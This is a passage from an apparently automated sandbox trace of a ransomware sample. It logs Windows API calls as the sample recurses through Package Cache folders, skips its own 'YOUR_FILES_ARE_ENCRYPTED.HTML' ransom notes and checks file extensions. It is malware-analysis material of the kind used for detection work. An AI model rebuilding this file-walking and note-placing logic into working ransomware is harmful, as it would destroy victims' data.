Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86" [0170.098] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*" [0170.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cebb750, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc23dd80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc23dd80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.099] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cebb750, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc23dd80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc23dd80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.099] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x972dc300, ftCreationTime.dwHighDateTime=0x1d287fd, ftLastAccessTime.dwLowDateTime=0x972dc300, ftLastAccessTime.dwHighDateTime=0x1d287fd, ftLastWriteTime.dwLowDateTime=0x972dc300, ftLastWriteTime.dwHighDateTime=0x1d287fd, nFileSizeHigh=0x0, nFileSizeLow=0x9990e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows6.1-KB2999226-x86.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0170.099] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\Windows6.1-KB2999226-x86.msu") returned 125 [0170.099] lstrcmpW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.099] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0170.099] lstrlenW (lpString=".msu") returned 4 [0170.099] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0170.099] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc23dd80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc23dd80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.099] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.099] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.099] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc23dd80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc23dd80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.099] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.099] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\patch\\x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.100] GetProcessHeap () returned 0x270000 [0170.101] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0170.101] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc263ee0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.101] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0170.101] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.101] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc263ee0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.101] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.101] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0170.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\patch\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.101] GetProcessHeap () returned 0x270000 [0170.102] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.102] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc263ee0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.102] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.102] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.102] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc263ee0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.103] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.103] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.103] GetProcessHeap () returned 0x270000 [0170.104] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.104] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc263ee0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.104] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0170.104] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.104] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc263ee0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.104] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.104] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0170.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.104] GetProcessHeap () returned 0x270000 [0170.105] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.111] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87c35b0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2d6300, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2d6300, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="D4036846864773E3D647F421DFE7F6CA536E307B", cAlternateFileName="D40368~1")) returned 1 [0170.112] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B") returned 77 [0170.112] GetProcessHeap () returned 0x270000 [0170.112] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.113] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B" [0170.113] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*" [0170.114] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87c35b0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2d6300, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2d6300, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.114] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87c35b0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2d6300, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2d6300, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.115] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0170.115] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages") returned 86 [0170.115] GetProcessHeap () returned 0x270000 [0170.115] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.117] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages" [0170.117] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*" [0170.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.118] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.118] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Patch", cAlternateFileName="")) returned 1 [0170.118] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch") returned 92 [0170.118] GetProcessHeap () returned 0x270000 [0170.118] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.119] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch" [0170.119] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*" [0170.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.120] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.120] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x86", cAlternateFileName="")) returned 1 [0170.120] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86") returned 96 [0170.120] GetProcessHeap () returned 0x270000 [0170.120] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0170.123] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86" [0170.123] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*" [0170.123] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.123] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.123] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7584c900, ftCreationTime.dwHighDateTime=0x1d0a14b, ftLastAccessTime.dwLowDateTime=0x7584c900, ftLastAccessTime.dwHighDateTime=0x1d0a14b, ftLastWriteTime.dwLowDateTime=0x7584c900, ftLastWriteTime.dwHighDateTime=0x1d0a14b, nFileSizeHigh=0x0, nFileSizeLow=0x98303, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows6.1-KB2999226-x86.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0170.123] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\Windows6.1-KB2999226-x86.msu") returned 125 [0170.123] lstrcmpW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.123] PathFindExtensionW 